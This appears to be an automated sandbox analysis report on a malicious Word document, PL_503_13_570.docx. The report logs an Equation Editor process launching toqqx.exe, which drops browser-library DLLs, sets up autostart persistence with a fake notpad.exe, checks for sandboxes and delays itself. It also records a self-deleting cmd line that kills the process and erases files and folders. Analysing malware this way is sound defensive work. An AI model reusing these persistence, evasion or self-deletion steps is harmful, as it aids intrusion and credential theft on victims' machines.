    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
    Source: PL_503_13_570.docxVirustotal: Detection: 36%
    Source: PL_503_13_570.docxReversingLabs: Detection: 34%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\toqqx.exe C:\Users\user\toqqx.exe
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\toqqx.exe C:\Users\user\toqqx.exe
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Users\user\toqqx.exeProcess created: C:\Users\user\AppData\Local\Temp\toqqx.exe C:\Users\user\AppData\Local\Temp\toqqx.exe
    Source: C:\Users\user\toqqx.exeProcess created: C:\Users\user\AppData\Local\Temp\toqqx.exe C:\Users\user\AppData\Local\Temp\toqqx.exe
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /pid 2540 & erase C:\Users\user\AppData\Local\Temp\toqqx.exe & RD /S /Q C:\\ProgramData\\843743064682002\\* & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 2540
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\toqqx.exe C:\Users\user\toqqx.exe
    Source: C:\Users\user\toqqx.exeProcess created: C:\Users\user\AppData\Local\Temp\toqqx.exe C:\Users\user\AppData\Local\Temp\toqqx.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\toqqx.exe C:\Users\user\toqqx.exe
    Source: C:\Users\user\toqqx.exeProcess created: C:\Users\user\AppData\Local\Temp\toqqx.exe C:\Users\user\AppData\Local\Temp\toqqx.exe
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /pid 2540 & erase C:\Users\user\AppData\Local\Temp\toqqx.exe & RD /S /Q C:\\ProgramData\\843743064682002\\* & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 2540
    Source: C:\Users\user\toqqx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\user\toqqx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: vcruntime140.i386.pdb source: toqqx.exe, 0000000B.00000003.2251913088.000000000097A000.00000004.00000001.sdmp
    Source: Binary string: vcruntime140.i386.pdbGCTL source: toqqx.exe, 0000000B.00000003.2251913088.000000000097A000.00000004.00000001.sdmp
    Source: Binary string: msvcp140.i386.pdbGCTL source: toqqx.exe, 0000000B.00000003.2242122953.0000000000A7D000.00000004.00000001.sdmp
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: toqqx.exe, 0000000B.00000003.2241406880.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: toqqx.exe, 0000000B.00000003.2241406880.0000000000990000.00000004.00000001.sdmp
    Source: Binary string: msvcp140.i386.pdb source: toqqx.exe, 0000000B.00000003.2242122953.0000000000A7D000.00000004.00000001.sdmp
    Source: PL_503_13_570.docxInitial sample: OLE indicators vbamacros = False
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041C810 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
    Source: sqlite3.dll.11.drStatic PE information: section name: /4
    Source: sqlite3.dll.11.drStatic PE information: section name: /19
    Source: sqlite3.dll.11.drStatic PE information: section name: /35
    Source: sqlite3.dll.11.drStatic PE information: section name: /51
    Source: sqlite3.dll.11.drStatic PE information: section name: /63
    Source: sqlite3.dll.11.drStatic PE information: section name: /77
    Source: sqlite3.dll.11.drStatic PE information: section name: /89
    Source: sqlite3.dll.11.drStatic PE information: section name: /102
    Source: sqlite3.dll.11.drStatic PE information: section name: /113
    Source: sqlite3.dll.11.drStatic PE information: section name: /124
    Source: mozglue.dll.13.drStatic PE information: section name: .didat
    Source: msvcp140.dll.13.drStatic PE information: section name: .didat
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_00408C65 push ecx; ret
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_00408C65 push ecx; ret
    Source: initial sampleStatic PE information: section name: .text entropy: 7.95918659067
    Source: initial sampleStatic PE information: section name: .text entropy: 7.95918659067
    Source: initial sampleStatic PE information: section name: .text entropy: 7.95918659067
    Source: initial sampleStatic PE information: section name: .text entropy: 7.95918659067
    Source: initial sampleStatic PE information: section name: .text entropy: 7.95918659067
    Source: C:\Users\user\toqqx.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\sqlite3.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\toqqx.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
    Source: C:\Users\user\toqqx.exeFile created: C:\Users\user\AppData\Local\Temp\toqqx.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Sugvt[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\sqlite3.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\toqqx.exeJump to dropped file

    Boot Survival:

    barindex
    Creates an undocumented autostart registry key Show sources
    Source: C:\Users\user\toqqx.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\toqqx.exeJump to dropped file
    Source: C:\Users\user\toqqx.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpadJump to behavior
    Source: C:\Users\user\toqqx.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_00419700 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    barindex
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: toqqx.exe, 00000004.00000002.2234554822.0000000000760000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000002.2250803213.0000000000A60000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
    Source: C:\Users\user\toqqx.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\toqqx.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dll
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dll
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2544Thread sleep time: -300000s >= -30000s
    Source: C:\Users\user\toqqx.exe TID: 2892Thread sleep time: -180000s >= -30000s
    Source: C:\Users\user\toqqx.exe TID: 2652Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\toqqx.exe TID: 2848Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 960Thread sleep time: -60000s >= -30000s
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2468Thread sleep time: -300000s >= -30000s
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2468Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\toqqx.exe TID: 2212Thread sleep time: -180000s >= -30000s
    Source: C:\Users\user\toqqx.exe TID: 2768Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\toqqx.exe TID: 2252Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1772Thread sleep time: -60000s >= -30000s
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1772Thread sleep time: -60000s >= -30000s
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2200Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe TID: 2620Thread sleep time: -120000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe TID: 2456Thread sleep time: -240000s >= -30000s
    Source: C:\Windows\SysWOW64\taskkill.exe TID: 1900Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile Volume queried: C:\ FullSizeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_00420540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041F6B0 FindFirstFileExW,
